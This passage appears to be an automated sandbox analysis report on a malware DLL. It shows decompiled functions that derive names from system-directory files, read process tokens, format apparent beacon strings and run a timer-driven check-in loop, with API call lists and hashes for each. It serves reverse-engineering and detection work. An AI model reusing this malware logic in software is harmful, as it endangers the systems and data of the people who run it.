                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x435d2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x435d238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x435d2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x435d238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x435d238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x435d2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x435d2a4; // 0x251a5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x435e7e8; // 0x73797325
                                          				_t83 = E043577E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x435d238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x435d2a4; // 0x251a5a8
                                          				_t16 = _t93 + 0x435e809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}












































                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 043532E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04353307
                                          • memset.NTDLL ref: 04353321
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0435333A,73797325), ref: 043577F7
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04357811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0435335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04353373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0435338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04353396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 043533D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 043533ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 0435340B
                                          • FindNextFileA.KERNELBASE(0435207E,?), ref: 0435341F
                                          • FindClose.KERNEL32(0435207E), ref: 0435342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04353438
                                          • CompareFileTime.KERNEL32(?,?), ref: 0435345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0435348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 043534C6
                                          • FindNextFileA.KERNELBASE(0435207E,?), ref: 043534DB
                                          • FindClose.KERNEL32(0435207E), ref: 043534E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 043534F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04353504
                                          • FindClose.KERNEL32(0435207E), ref: 04353539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0435354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 0435355B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: ccc42fe7643169529cbbcdecee49158a8b02de5638ea0ff42bbddb3b3b67593c
                                          • Instruction ID: dd23ca521cc5b80bcd2a273c12e8c029be3f98a28a56d628d8176efb0b3f9a70
                                          • Opcode Fuzzy Hash: ccc42fe7643169529cbbcdecee49158a8b02de5638ea0ff42bbddb3b3b67593c
                                          • Instruction Fuzzy Hash: 19813BB1900219AFDB119FA5DC84EFEBBBDEF48344F106469E905E7260E774AA44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E043571B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E043558BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E0435147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}




















                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04357200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04357213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0435722F
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0435724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04357259
                                          • NtClose.NTDLL(?), ref: 0435726B
                                          • NtClose.NTDLL(00000000), ref: 04357275
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 43fa5107b341fc34192910a4d5687dff2ee164e7a244a1dfc204e7705568ac55
                                          • Instruction ID: 1c25380cc7d9005fc71e45f3928d436a0e51f2c279a1cd4d587fb8a75cdb38bf
                                          • Opcode Fuzzy Hash: 43fa5107b341fc34192910a4d5687dff2ee164e7a244a1dfc204e7705568ac55
                                          • Instruction Fuzzy Hash: 0C2105B2900218BBDB01AF95DC85EDEBFBDEF08744F105022FA00F6120D7719B409BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04351754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				signed int _t115;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x435d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x435d014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x435d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x435d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x435d2a4; // 0x251a5a8
                                          				_t3 = _t65 + 0x435e633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x435d02c,  *0x435d004, _t60);
                                          				_t68 = E043557AB();
                                          				_t69 =  *0x435d2a4; // 0x251a5a8
                                          				_t4 = _t69 + 0x435e673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E043573E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x435d2a4; // 0x251a5a8
                                          					_t7 = _t130 + 0x435e8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x435d238, 0, _v8);
                                          				}
                                          				_t74 = E0435614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x435d2a4; // 0x251a5a8
                                          					_t11 = _t125 + 0x435e8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x435d238, 0, _v8);
                                          				}
                                          				_t150 =  *0x435d324; // 0x68795b0
                                          				_t76 = E0435757B(0x435d00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					RtlFreeHeap( *0x435d238, _t156, _a16); // executed
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x435d238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x435d238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E0435749F(GetTickCount());
                                          					_t83 =  *0x435d324; // 0x68795b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x435d324; // 0x68795b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x435d324; // 0x68795b0
                                          					_t152 = E04354D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x435d238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x435c294);
                                          					_t95 =  *0x435d2a4; // 0x251a5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x435e252; // 0x616d692f
                                          					_t97 = E04359DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x435d238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E0435A5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E04356106();
                                          						L22:
                                          						HeapFree( *0x435d238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E04352F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_t115 = E0435A060(_t161, _a4, _a8, _a12); // executed
                                          						_v12 = _t115;
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E0435147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E04351600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E0435147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04351768
                                          • wsprintfA.USER32 ref: 043517B8
                                          • wsprintfA.USER32 ref: 043517D5
                                          • wsprintfA.USER32 ref: 04351801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04351813
                                          • wsprintfA.USER32 ref: 04351834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04351844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04351872
                                          • GetTickCount.KERNEL32 ref: 04351883
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 04351897
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 043518B5
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?,068795B0), ref: 04354D57
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(?,?,?,043552FE,?,068795B0), ref: 04354D5F
                                            • Part of subcall function 04354D2C: strcpy.NTDLL ref: 04354D76
                                            • Part of subcall function 04354D2C: lstrcat.KERNEL32(00000000,?), ref: 04354D81
                                            • Part of subcall function 04354D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,043552FE,?,068795B0), ref: 04354D9E
                                          • StrTrimA.SHLWAPI(00000000,0435C294,?,068795B0), ref: 043518EC
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?,00000000,00000000,04355335,616D692F,00000000), ref: 04359DFB
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?), ref: 04359E03
                                            • Part of subcall function 04359DEF: lstrcpy.KERNEL32(00000000,?), ref: 04359E1A
                                            • Part of subcall function 04359DEF: lstrcat.KERNEL32(00000000,?), ref: 04359E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04351919
                                          • lstrcpy.KERNEL32(?,?), ref: 04351921
                                          • lstrcat.KERNEL32(?,?), ref: 0435192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04351935
                                            • Part of subcall function 0435A5E9: lstrlen.KERNEL32(?,00000000,0435D330,00000001,0435937A,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?), ref: 0435A5F2
                                            • Part of subcall function 0435A5E9: mbstowcs.NTDLL ref: 0435A619
                                            • Part of subcall function 0435A5E9: memset.NTDLL ref: 0435A62B
                                          • wcstombs.NTDLL ref: 043519C8
                                            • Part of subcall function 0435A060: SysAllocString.OLEAUT32(?), ref: 0435A09B
                                            • Part of subcall function 0435A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0435A11E
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04351A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04351A15
                                          • HeapFree.KERNEL32(00000000,?,?,068795B0), ref: 04351A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04351A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04351A39
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: ccd0e4b1454454966517f49adf63837a4808e80643bb1fdc20cb0085a57bcfec
                                          • Instruction ID: 686134b96b2c6ad09dd58fe28e61ac406f18f3b93f70f64f7241240f6eb344f5
                                          • Opcode Fuzzy Hash: ccd0e4b1454454966517f49adf63837a4808e80643bb1fdc20cb0085a57bcfec
                                          • Instruction Fuzzy Hash: 6191F671900209AFDB11AFA4EC88EAE7BBDEF08354F14A155F808D7260D739ED51DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 97 4359b6f-4359ba1 memset CreateWaitableTimerA 98 4359ba7-4359c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 4359d23-4359d29 GetLastError 97->99 101 4359c06-4359c09 98->101 102 4359c8b-4359c91 98->102 100 4359d2d-4359d37 99->100 103 4359c14 101->103 104 4359c0b call 43568cf 101->104 105 4359c92-4359c96 102->105 106 4359c1e 103->106 111 4359c10-4359c12 104->111 108 4359ca6-4359caa 105->108 109 4359c98-4359ca0 HeapFree 105->109 110 4359c22-4359c27 106->110 108->105 112 4359cac-4359cb6 CloseHandle 108->112 109->108 113 4359c29-4359c30 110->113 114 4359c3a-4359c68 call 4359f11 110->114 111->103 111->106 112->100 113->114 115 4359c32 113->115 118 4359cb8-4359cbd 114->118 119 4359c6a-4359c75 114->119 115->114 120 4359cdc-4359ce4 118->120 121 4359cbf-4359cc5 118->121 119->110 122 4359c77-4359c87 call 43554ac 119->122 124 4359cea-4359d18 _allmul SetWaitableTimer WaitForMultipleObjects 120->124 121->102 123 4359cc7-4359cda call 4356106 121->123 122->102 123->124 124->110 127 4359d1e 124->127 127->102
                                          C-Code - Quality: 83%
                                          			E04359B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x435d240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L0435B088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x435d26c; // 0x3d0
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x435d24c = 5;
                                          						} else {
                                          							_t68 = E043568CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x435d260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E04359F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E043554AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x435d244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x435d248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E04356106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x435d248);
                                          								L21:
                                          								L0435B088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x435d238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 04359B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04359B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04359BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04359BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04354AC4,?), ref: 04359BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04354AC4,?,00000000), ref: 04359CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04354AC4,?,00000000,?,?), ref: 04359CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04359CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04359D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04359D10
                                            • Part of subcall function 043568CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06879388,00000000,?,7519F710,00000000,7519F730), ref: 0435691E
                                            • Part of subcall function 043568CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068793C0,?,00000000,30314549,00000014,004F0053,0687937C), ref: 043569BB
                                            • Part of subcall function 043568CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04359C10), ref: 043569CD
